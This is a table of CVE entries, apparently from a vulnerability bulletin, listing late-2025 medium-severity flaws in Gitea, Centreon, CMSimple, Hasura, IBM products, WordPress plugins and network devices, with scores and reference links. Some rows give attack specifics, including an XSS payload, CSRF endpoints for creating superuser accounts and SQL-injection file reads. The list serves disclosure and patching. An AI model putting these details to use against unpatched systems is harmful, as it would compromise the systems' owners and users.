| Bob--Hostel | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Bob Hostel allows DOM-Based XSS. This issue affects Hostel: from n/a through 1.1.5.1. | 2025-12-24 | 5.9 | CVE-2023-32120 | https://vdp.patchstack.com/database/wordpress/plugin/hostel/vulnerability/wordpress-hostel-plugin-1-1-5-1-cross-site-scripting-xss?_s_id=cve |
| BTicino S.p.A.--Legrand BTicino Driver Manager F454 | Legrand BTicino Driver Manager F454 1.0.51 contains multiple web vulnerabilities that allow attackers to perform administrative actions without proper request validation. Attackers can exploit cross-site request forgery to change passwords and inject stored cross-site scripting payloads through unvalidated GET parameters. | 2025-12-24 | 5.3 | CVE-2019-25244 | ExploitDB-46850 BTicino Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5521) Zero Science Lab Disclosure (ZSL-2019-5522) |
| Carlo Gavazzi AB--SmartHouse Webapp | SmartHouse Webapp 6.5.33 contains multiple cross-site request forgery and cross-site scripting vulnerabilities that allow attackers to perform unauthorized actions. Attackers can exploit these vulnerabilities by tricking logged-in users into visiting malicious websites or injecting malicious scripts into various application parameters. | 2025-12-24 | 5.3 | CVE-2019-25234 | ExploitDB-47730 SmartHouse Product Website Zero Science Lab Disclosure (ZSL-2019-5553) |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Hostgroup configuration page) allows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19, from 23.10.0 before 23.10.29. | 2025-12-22 | 6.8 | CVE-2025-54890 | https://github.com/centreon/centreon/releases |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Notification rules, Open tickets module) allows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4. | 2025-12-22 | 6.8 | CVE-2025-8460 | https://github.com/centreon/centreon/releases |
| checkpoint--Identity Agent | An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being accessible in the Windows Registry keys for Check Point Identity Agent running on a Terminal Server. | 2025-12-22 | 6.5 | CVE-2025-8304 | https://support.checkpoint.com/results/sk/sk184263 |
| checkpoint--Identity Awareness | An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being printed in plaintext in Identity Agent for Terminal Services debug files. | 2025-12-22 | 6.5 | CVE-2025-8305 | https://support.checkpoint.com/results/sk/sk184264 |
| ChenJinchuang--Lin-CMS-TP5 | A flaw has been found in ChenJinchuang Lin-CMS-TP5 up to 0.3.3. This vulnerability affects the function Upload of the file application/lib/file/LocalUploader.php of the component File Upload Handler. Executing manipulation of the argument File can lead to code injection. The attack can be executed remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 6.3 | CVE-2025-15129 | VDB-338507 | ChenJinchuang Lin-CMS-TP5 File Upload LocalUploader.php upload code injection VDB-338507 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #712754 | lin-cms-tp5 1.0 Unrestricted Upload https://github.com/ChenJinchuang/lin-cms-tp5/issues/65 |
| Cmsimple--CMSimple | CMSimple 5.4 contains a cross-site scripting vulnerability that allows attackers to bypass input filtering by using HTML to Unicode encoding. Attackers can inject malicious scripts by encoding payloads like ')-alert(1)// and execute arbitrary JavaScript when victims interact with delete buttons. | 2025-12-23 | 6.1 | CVE-2021-47733 | ExploitDB-50612 CMSimple Official Homepage VulnCheck Advisory: CMSimple 5.4 Cross-Site Scripting via HTML Unicode Encoding |
| Cmsimple--CMSimple | CMSimple 5.4 contains an authenticated local file inclusion vulnerability that allows remote attackers to manipulate PHP session files and execute arbitrary code. Attackers can leverage the vulnerability by changing the functions file path and uploading malicious PHP code through session file upload mechanisms. | 2025-12-23 | 5.5 | CVE-2021-47734 | ExploitDB-50547 Official CMSimple Homepage VulnCheck Advisory: CMSimple 5.4 Authenticated Local File Inclusion Remote Code Execution |
| Cobiansoft--Cobian Backup Gravity | Cobian Backup 11 Gravity 11.2.0.582 contains a denial of service vulnerability in the FTP password input field that allows attackers to crash the application. Attackers can generate a specially crafted 800-byte buffer and paste it into the password field to trigger an application crash. | 2025-12-22 | 6.2 | CVE-2022-50687 | ExploitDB-50790 Cobian Backup Official Vendor Homepage VulnCheck Advisory: Cobian Backup 11 Gravity 11.2.0.582 Local Denial of Service via Password Field |
| Cobiansoft--Cobian Reflector | Cobian Reflector 0.9.93 RC1 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the password input field. Attackers can paste a large 8000-byte buffer into the password field to trigger an application crash during SFTP task configuration. | 2025-12-22 | 6.2 | CVE-2022-50689 | ExploitDB-50789 Cobian Software Official Homepage VulnCheck Advisory: Cobian Reflector 0.9.93 RC1 Local Denial of Service via Password Field |
| code-projects--Student File Management System | A security vulnerability has been detected in code-projects Student File Management System 1.0. This affects an unknown part of the file /save_file.php. Such manipulation of the argument File leads to unrestricted upload. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-24 | 6.3 | CVE-2025-15050 | VDB-337857 | code-projects Student File Management System save_file.php unrestricted upload VDB-337857 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721073 | Code-Projects å¦ç”Ÿæ–‡ä»¶ç®¡ç†ç³»ç»Ÿ V1.0 ä»»æ„æ–‡ä»¶ä¸Šä¼ Submit #721039 | code-projects.org å¦ç”Ÿæ–‡ä»¶ç®¡ç†ç³»ç»Ÿ V1.0 æ–‡ä»¶ä¸Šä¼ (Duplicate) https://github.com/Bai-public/CVE/issues/3 https://code-projects.org/ |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor).This issue affects TheGem Theme Elements (for Elementor): from n/a through 5.10.5.1. | 2025-12-23 | 6.5 | CVE-2025-68559 | https://vdp.patchstack.com/database/wordpress/plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Cszcms--CSZ CMS | CSZ CMS 1.2.7 contains a persistent cross-site scripting vulnerability that allows unauthorized users to embed malicious JavaScript in private messages. Attackers can send messages with script payloads in the user-agent header, which will execute when an admin views the message in the backend dashboard. | 2025-12-23 | 6.4 | CVE-2021-47738 | ExploitDB-48354 Official CSZ CMS Vendor Homepage CSZ CMS SourceForge Project VulnCheck Advisory: CSZ CMS 1.2.7 Persistent Cross-Site Scripting via Private Messaging |
| Cszcms--CSZ CMS | CSZ CMS 1.2.7 contains an HTML injection vulnerability that allows authenticated users to insert malicious hyperlinks in message titles. Attackers can craft POST requests to the member messaging system with HTML-based links to potentially conduct phishing or social engineering attacks. | 2025-12-23 | 5.4 | CVE-2021-47737 | ExploitDB-48357 Official CSZ CMS Vendor Homepage CSZ CMS SourceForge Project VulnCheck Advisory: CSZ CMS 1.2.7 HTML Injection Vulnerability via Member Dashboard |
| dayrui--XunRuiCMS | A weakness has been identified in dayrui XunRuiCMS up to 4.7.1. The impacted element is the function dr_show_error/dr_exit_msg of the file /dayrui/Fcms/Init.php of the component JSONP Callback Handler. This manipulation of the argument callback causes cross site scripting. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.3 | CVE-2025-15144 | VDB-338522 | dayrui XunRuiCMS JSONP Callback Init.php dr_exit_msg cross site scripting VDB-338522 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716122 | xunruicms 4.7.1 xss https://note-hxlab.wetolink.com/share/gbCf35DJ3los |
| Delta Electronics--DVP15MC11T | Delta Electronics DVP15MC11T lacks proper validation of the modbus/tcp packets and can lead to denial of service. | 2025-12-22 | 4 | CVE-2025-59301 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00020_DVP15MC11T%20Modbus%20TCP%20DoS%20Vulnerability.pdf |
| devolo AG--dLAN 550 duo+ Starter Kit | Devolo dLAN 500 AV Wireless+ 3.1.0-1 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that trigger unauthorized configuration changes by exploiting predictable URL actions when a logged-in user visits the site. | 2025-12-24 | 5.3 | CVE-2019-25250 | ExploitDB-46324 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5507) |
| Eaton--UPS Companion software | Improper quotation in search paths in the Eaton UPS Companion software installer could lead to arbitrary code execution of an attacker with the access to the file system. This security issue has been fixed in the latest version of EUC which is available on the Eaton download center. | 2025-12-26 | 6.7 | CVE-2025-59888 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1026.pdf |
| Ecessa Corporation--Ecessa Edge EV150 | Ecessa Edge EV150 10.7.4 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without authentication. Attackers can craft a malicious web page with a form that submits requests to the /cgi-bin/pl_web.cgi/util_configlogin_act endpoint to add superuser accounts with arbitrary credentials. | 2025-12-24 | 5.3 | CVE-2018-25152 | ExploitDB-44932 Ecessa Corporation Product Homepage |
| Ecessa Corporation--Ecessa ShieldLink SL175EHQ | Ecessa ShieldLink SL175EHQ 10.7.4 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without authentication. Attackers can craft a malicious web page with a hidden form to add a superuser account by tricking a logged-in administrator into loading the page. | 2025-12-24 | 5.3 | CVE-2018-25150 | ExploitDB-44938 Ecessa Corporation Product Homepage |
| Ecessa Corporation--WANWorx WVR-30 | Ecessa WANWorx WVR-30 versions before 10.7.4 contain a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. Attackers can craft a malicious web page with a hidden form to create a new superuser account by tricking an authenticated administrator into loading the page. | 2025-12-24 | 4.3 | CVE-2018-25151 | ExploitDB-44936 Ecessa Corporation Official Website |
| Echo Call Center Services Trade and Industry Inc.--Specto CM | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Echo Call Center Services Trade and Industry Inc. Specto CM allows Stored XSS.This issue affects Specto CM: before 17032025. | 2025-12-24 | 5.4 | CVE-2025-2154 | https://www.usom.gov.tr/bildirim/tr-25-0480 |
| floooh--sokol | A vulnerability was identified in floooh sokol up to 5d11344150973f15e16d3ec4ee7550a73fb995e0. The impacted element is the function _sg_validate_pipeline_desc in the library sokol_gfx.h. Such manipulation leads to stack-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The name of the patch is b95c5245ba357967220c9a860c7578a7487937b0. It is best practice to apply a patch to resolve this issue. | 2025-12-22 | 5.3 | CVE-2025-15013 | VDB-337719 | floooh sokol sokol_gfx.h _sg_validate_pipeline_desc stack-based overflow VDB-337719 | CTI Indicators (IOB, IOC, IOA) Submit #719820 | floooh sokol e0832c9 Stack-based Buffer Overflow https://github.com/floooh/sokol/issues/1404 https://github.com/seyhajin/sokol/pull/246 https://github.com/oneafter/1212/blob/main/stack1 https://github.com/seyhajin/sokol/commit/b95c5245ba357967220c9a860c7578a7487937b0 |
| floooh--sokol | A vulnerability was detected in floooh sokol up to 16cbcc864012898793cd2bc57f802499a264ea40. The impacted element is the function _sg_pipeline_desc_defaults in the library sokol_gfx.h. The manipulation results in stack-based buffer overflow. The attack requires a local approach. The exploit is now public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is identified as 5d11344150973f15e16d3ec4ee7550a73fb995e0. It is advisable to implement a patch to correct this issue. | 2025-12-28 | 5.3 | CVE-2025-15155 | VDB-338533 | floooh sokol sokol_gfx.h _sg_pipeline_desc_defaults stack-based overflow VDB-338533 | CTI Indicators (IOB, IOC, IOA) Submit #719823 | floooh sokol e0832c9 Stack-based Buffer Overflow https://github.com/floooh/sokol/issues/1405 https://github.com/floooh/sokol/issues/1406#issuecomment-3649548096 https://github.com/oneafter/1212/blob/main/hbf1 https://github.com/floooh/sokol/commit/5d11344150973f15e16d3ec4ee7550a73fb995e0 |
| FreshRSS--FreshRSS | FreshRSS is a free, self-hostable RSS aggregator. From version 1.27.0 to before 1.28.0, An attacker could globally deny access to feeds via proxy modifying to 429 Retry-After for a large list of feeds on given instance, making it unusable for majority of users. This issue has been patched in version 1.28.0. | 2025-12-26 | 4.3 | CVE-2025-68148 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-qw34-frg7-gf78 https://github.com/FreshRSS/FreshRSS/pull/8029 https://github.com/FreshRSS/FreshRSS/commit/7d4854a0a4f5665db599f18c34035786465639f3 |
| Fujitsu / Fsas Technologies--ETERNUS SF ACM/SC/Express | Fujitsu / Fsas Technologies ETERNUS SF ACM/SC/Express (DX / AF Management Software) before 16.8-16.9.1 PA 2025-12, when collected maintenance data is accessible by a principal/authority other than ETERNUS SF Admin, allows an attacker to potentially affect system confidentiality, integrity, and availability. | 2025-12-24 | 5.6 | CVE-2025-68919 | https://security.ts.fujitsu.com/ProductSecurity/content/FsasTech-PSIRT-FTI-STR-2025-111413-Security-Notice.pdf |
| getmaxun--maxun | A weakness has been identified in getmaxun maxun up to 0.0.28. The affected element is the function router.get of the file server/src/routes/auth.ts of the component Authentication Endpoint. Executing manipulation can lead to improper authorization. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-27 | 6.3 | CVE-2025-15106 | VDB-338477 | getmaxun Authentication Endpoint auth.ts router.get improper authorization VDB-338477 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710268 | https://github.com/getmaxun https://github.com/getmaxun/maxun ≤ v0.0.28 Authentication Bypass Issues https://gist.github.com/H2u8s/1a0bdb19d5c8c8f4dc72cb49ffe9a22b |
| Gitea--Gitea | Gitea before 1.22.2 allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text. | 2025-12-26 | 5.4 | CVE-2025-68942 | https://blog.gitea.com/release-of-1.22.2/ https://github.com/go-gitea/gitea/releases/tag/v1.22.2 https://github.com/go-gitea/gitea/pull/31966 |
| Gitea--Gitea | Gitea before 1.21.8 inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order. | 2025-12-26 | 5.3 | CVE-2025-68943 | https://blog.gitea.com/release-of-1.21.8-and-1.21.9-and-1.21.10/ https://github.com/go-gitea/gitea/releases/tag/v1.21.8 https://github.com/go-gitea/gitea/pull/29430 |
| Gitea--Gitea | Gitea before 1.22.2 sometimes mishandles the propagation of token scope for access control within one of its own package registries. | 2025-12-26 | 5 | CVE-2025-68944 | https://blog.gitea.com/release-of-1.22.2/ https://github.com/go-gitea/gitea/releases/tag/v1.22.2 https://github.com/go-gitea/gitea/pull/31967 |
| Gitea--Gitea | In Gitea before 1.21.2, an anonymous user can visit a private user's project. | 2025-12-26 | 5.8 | CVE-2025-68945 | https://blog.gitea.com/release-of-1.21.2/ https://github.com/go-gitea/gitea/releases/tag/v1.21.2 https://github.com/go-gitea/gitea/pull/28423 |
| Gitea--Gitea | In Gitea before 1.20.1, a forbidden URL scheme such as javascript: can be used for a link, aka XSS. | 2025-12-26 | 5.4 | CVE-2025-68946 | https://blog.gitea.com/release-of-1.20.1/ https://github.com/go-gitea/gitea/releases/tag/v1.20.1 https://github.com/go-gitea/gitea/pull/25960 |
| Gitea--Gitea | Gitea before 1.25.2 mishandles authorization for deletion of releases. | 2025-12-26 | 4.3 | CVE-2025-68938 | https://blog.gitea.com/release-of-1.25.2/ https://github.com/go-gitea/gitea/releases/tag/v1.25.2 https://github.com/go-gitea/gitea/pull/36002/commits/d4262131b39899d9e9ee5caa2635c810d476e43f#diff-8962bac89952027d50fa51f31f59d65bedb4c02bde0265eced5cf256cbed306d |
| Gitea--Gitea | Gitea before 1.22.3 mishandles access to a private resource upon receiving an API token with scope limited to public resources. | 2025-12-26 | 4.9 | CVE-2025-68941 | https://blog.gitea.com/release-of-1.22.3/ https://github.com/go-gitea/gitea/releases/tag/v1.22.3 https://github.com/go-gitea/gitea/pull/32218 |
| GnuPG--GnuPG | In GnuPG through 2.4.8, if a signed message has \f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an "invalid armor" message is printed during verification). This is related to use of \f as a marker to denote truncation of a long plaintext line. | 2025-12-27 | 5.9 | CVE-2025-68972 | https://gpg.fail/formfeed https://news.ycombinator.com/item?id=46404339 |
| Guangzhou V-SOLUTION Electronic Technology Co., Ltd.--SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform 2.03 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to create admin users, enable SSH, or modify system settings by tricking authenticated administrators into loading a specially crafted page. | 2025-12-24 | 4.3 | CVE-2019-25238 | ExploitDB-47434 V-SOL Product Homepage Zero Science Lab Disclosure (ZSL-2019-5536) |
| h-moses--moga-mall | A vulnerability was identified in h-moses moga-mall up to 392d631a5ef15962a9bddeeb9f1269b9085473fa. This vulnerability affects the function addProduct of the file src/main/java/com/ms/product/controller/PmsProductController.java. Such manipulation of the argument objectName leads to unrestricted upload. The attack may be performed from remote. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. | 2025-12-28 | 6.3 | CVE-2025-15152 | VDB-338529 | h-moses moga-mall PmsProductController.java addProduct unrestricted upload VDB-338529 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721988 | https://github.com/h-moses/moga-mall moga-mall 1.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/moga-mall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| Hasura--Hasura GraphQL | Hasura GraphQL 1.3.3 contains a local file read vulnerability that allows attackers to access system files through SQL injection in the query endpoint. Attackers can exploit the pg_read_file() PostgreSQL function by crafting malicious SQL queries to read arbitrary files on the server. | 2025-12-22 | 5.5 | CVE-2021-47714 | ExploitDB-49790 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 Local File Read via SQL Injection |
| Hasura--Hasura GraphQL | Hasura GraphQL 1.3.3 contains a server-side request forgery vulnerability that allows attackers to inject arbitrary remote schema URLs through the add_remote_schema endpoint. Attackers can exploit the vulnerability by sending crafted POST requests to the /v1/query endpoint with malicious URL definitions to potentially access internal network resources. | 2025-12-22 | 5.3 | CVE-2021-47715 | ExploitDB-49791 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 Server-Side Request Forgery via Remote Schema Injection |
| IBM--Aspera Faspex 5 | IBM Aspera Faspex 5 5.0.0 through 5.0.14.1 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. | 2025-12-26 | 5.4 | CVE-2025-36230 | https://www.ibm.com/support/pages/node/7255331 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 stores sensitive information in cleartext during recursive docker builds which could be obtained by a local user. | 2025-12-24 | 6.2 | CVE-2025-36154 | https://www.ibm.com/support/pages/node/7255549 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory. | 2025-12-26 | 5.9 | CVE-2025-1721 | https://www.ibm.com/support/pages/node/7255549 |
| IBM--Db2 Intelligence Center | IBM Db2 Intelligence Center 1.1.0, 1.1.1, 1.1.2 could allow an authenticated user to perform unauthorized actions due to client-side enforcement of sever side security mechanisms. | 2025-12-26 | 4.3 | CVE-2025-14687 | https://www.ibm.com/support/pages/node/7255160 |
| IBM--DS8A00( R10.1) | IBM DS8A00( R10.1) 10.10.106.0 and IBM DS8A00 ( R10.0) 10.1.3.010.2.45.0 and IBM DS8900F ( R9.4) 89.40.83.089.42.18.089.44.5.0 IBM System Storage DS8000 could allow a local user with authorized CCW update permissions to delete or corrupt backups due to missing authorization in IBM Safeguarded Copy / GDPS Logical corruption protection mechanisms. | 2025-12-26 | 6.7 | CVE-2025-36192 | https://www.ibm.com/support/pages/node/7255039 |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to change administrator passwords, add new admin users, or open access control doors by tricking authenticated users into loading a specially crafted webpage. | 2025-12-24 | 4.3 | CVE-2019-25242 | ExploitDB-47065 Vendor Product Homepage Zero Science Lab Disclosure (ZSL-2019-5524) |
| jackq--XCMS | A vulnerability has been found in jackq XCMS up to 3fab5342cc509945a7ce1b8ec39d19f701b89261. Affected is the function Upload of the file Admin/Home/Controller/ProductImageController.class.php of the component Backend. Such manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-27 | 4.7 | CVE-2025-15110 | VDB-338481 | jackq XCMS Backend ProductImageController.class.php upload unrestricted upload VDB-338481 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711702 | XCMS 1.1 Unrestricted Upload https://gitee.com/jackq/XCMS/issues/IDC5C8 |
| jcthiele--OpenXRechnungToolbox | OpenXRechnungToolbox through 2024-10-05-3.0.0 before 6c50e89 allows XXE because the disallow-doctype-decl feature is not enabled in visualization/VisualizerImpl.java. | 2025-12-24 | 5 | CVE-2024-58335 | https://github.com/jcthiele/OpenXRechnungToolbox/commit/6c50e8979924b09f336c976cbad3a9ebfe25ebf9 https://invoice.secvuln.info |
| JD--Cloud BE6500 | A vulnerability has been found in JD Cloud BE6500 4.4.1.r4308. This issue affects the function sub_4780 of the file /jdcapi. Such manipulation of the argument ddns_name leads to command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 6.3 | CVE-2025-15081 | VDB-338409 | JD Cloud BE6500 jdcapi sub_4780 command injection VDB-338409 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707276 | JD cloud 京东云 JD Cloud BE6500 4.4.1.r4308 Command Injection https://gist.github.com/isstabber/4ed3554130681e50b3e987c3c4ee1f29 |
| Jewel Theme--Master Addons for Elementor | Missing Authorization vulnerability in Jewel Theme Master Addons for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Master Addons for Elementor: from n/a through 2.0.5.3. | 2025-12-24 | 6.5 | CVE-2023-40679 | https://vdp.patchstack.com/database/wordpress/plugin/master-addons/vulnerability/wordpress-master-elementor-addons-plugin-2-0-3-broken-access-control-vulnerability?_s_id=cve |
| joey-zhou--xiaozhi-esp32-server-java | A weakness has been identified in joey-zhou xiaozhi-esp32-server-java up to 3.0.0. This impacts the function tryAuthenticateWithCookies of the file AuthenticationInterceptor.java of the component Cookie Handler. Executing manipulation can lead to improper authentication. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. Upgrading to version 4.0.0 will fix this issue. It is recommended to upgrade the affected component. | 2025-12-28 | 6.3 | CVE-2025-15135 | VDB-338513 | joey-zhou xiaozhi-esp32-server-java Cookie AuthenticationInterceptor.java tryAuthenticateWithCookies improper authentication VDB-338513 | CTI Indicators (IOB, IOC, IOA) Submit #713990 | joey-zhou xiaozhi-esp32-server-java V3.0.0 Improper Authentication https://github.com/joey-zhou/xiaozhi-esp32-server-java/issues/143 https://github.com/joey-zhou/xiaozhi-esp32-server-java/issues/143#issuecomment-3666534810 https://github.com/joey-zhou/xiaozhi-esp32-server-java/issues/143#issue-3722315701 https://github.com/joey-zhou/xiaozhi-esp32-server-java/releases/tag/v4.0.0 |
| ketr--JEPaaS | A vulnerability was detected in ketr JEPaaS up to 7.2.8. Affected by this vulnerability is the function postilService.loadPostils of the file /je/postil/postil/loadPostil. Performing manipulation of the argument keyWord results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 6.3 | CVE-2025-15088 | VDB-338416 | ketr JEPaaS loadPostil postilService.loadPostils sql injection VDB-338416 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708321 | 北京凯特伟业科技有é™å…¬å¸ jepaas v7.2.8 SQL Injection https://github.com/ha1yu-Yiqiyin/warehouse/blob/main/jepaas-v7.2.8-sqlinject1.md https://github.com/ha1yu-Yiqiyin/warehouse/blob/main/jepaas-v7.2.8-sqlinject1.md#2%E5%A4%8D%E7%8E%B0replicate |
| kieranoshea--Calendar | The Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'event_desc' parameter in all versions up to, and including, 1.3.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can convince an administrator to enable lower privilege users to manage calendar events via the plugin settings. | 2025-12-23 | 6.4 | CVE-2025-14548 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2e61489d-a433-4d44-bb12-8c84204922b9?source=cve https://plugins.trac.wordpress.org/browser/calendar/trunk/calendar.php#L2154 https://plugins.trac.wordpress.org/browser/calendar/trunk/calendar.php#L899 https://plugins.trac.wordpress.org/changeset?new=3419088%40calendar%2Ftrunk&old=3122280%40calendar%2Ftrunk |
| Kunal Nagar--Custom 404 Pro | Cross-Site Request Forgery (CSRF) vulnerability in Kunal Nagar Custom 404 Pro allows Cross Site Request Forgery. This issue affects Custom 404 Pro: from n/a through 3.12.0. | 2025-12-22 | 4.3 | CVE-2025-62880 | https://vdp.patchstack.com/database/wordpress/plugin/custom-404-pro/vulnerability/wordpress-custom-404-pro-plugin-3-12-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| KYOCERA Corporation--KYOCERA Net Admin | KYOCERA Net Admin 3.4.0906 contains a cross-site request forgery vulnerability that allows attackers to create administrative users without proper request validation. Attackers can craft malicious web pages that automatically submit forms to add new admin accounts with predefined credentials when a logged-in user visits the page. | 2025-12-24 | 5.3 | CVE-2019-25254 | ExploitDB-44431 KYOCERA Official Website Zero Science Lab Disclosure (ZSL-2018-5458) |
| leap13--Premium Addons for Elementor Powerful Elementor Templates & Widgets | The Premium Addons for Elementor - Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_template_content' function in all versions up to, and including, 4.11.53. This makes it possible for unauthenticated attackers to view the content of private, draft, and pending templates. | 2025-12-23 | 5.3 | CVE-2025-14155 | https://www.wordfence.com/threat-intel/vulnerabilities/id/135c33bb-5ec2-4697-9340-1d2651ff3a0b?source=cve https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L1624 https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L90 https://plugins.trac.wordpress.org/changeset/3416254/ |
| leap13--Premium Addons for Elementor Powerful Elementor Templates & Widgets | The Premium Addons for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.11.53. This is due to missing nonce validation in the 'insert_inner_template' function. This makes it possible for unauthenticated attackers to create arbitrary Elementor templates via a forged request granted they can trick a site administrator or other user with the edit_posts capability into performing an action such as clicking on a link. | 2025-12-23 | 4.3 | CVE-2025-14163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/77b57f2a-0b46-4b4a-bdca-1c5218d739ce?source=cve https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L246 https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L40 https://plugins.trac.wordpress.org/changeset/3416254/ |
| LearningCircuit--local-deep-research | Local Deep Research is an AI-powered research assistant for deep, iterative research. In versions from 1.3.0 to before 1.3.9, the download service (download_service.py) makes HTTP requests using raw requests.get() without utilizing the application's SSRF protection (safe_requests.py). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls. This issue has been patched in version 1.3.9. | 2025-12-23 | 6.3 | CVE-2025-67743 | https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-9c54-gxh7-ppjc https://github.com/LearningCircuit/local-deep-research/commit/b79089ff30c5d9ae77e6b903c408e1c26ad5c055 |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.12.0, the Alert Rule API is vulnerable to stored cross-site scripting. Alert rules can be created or updated via LibreNMS API. The alert rule name is not properly sanitized, and can be used to inject HTML code. This issue has been patched in version 25.12.0. | 2025-12-22 | 4.3 | CVE-2025-68614 | https://github.com/librenms/librenms/security/advisories/GHSA-c89f-8g7g-59wj https://github.com/librenms/librenms/commit/ebe6c79bf4ce0afeb575c1285afe3934e44001f1 |
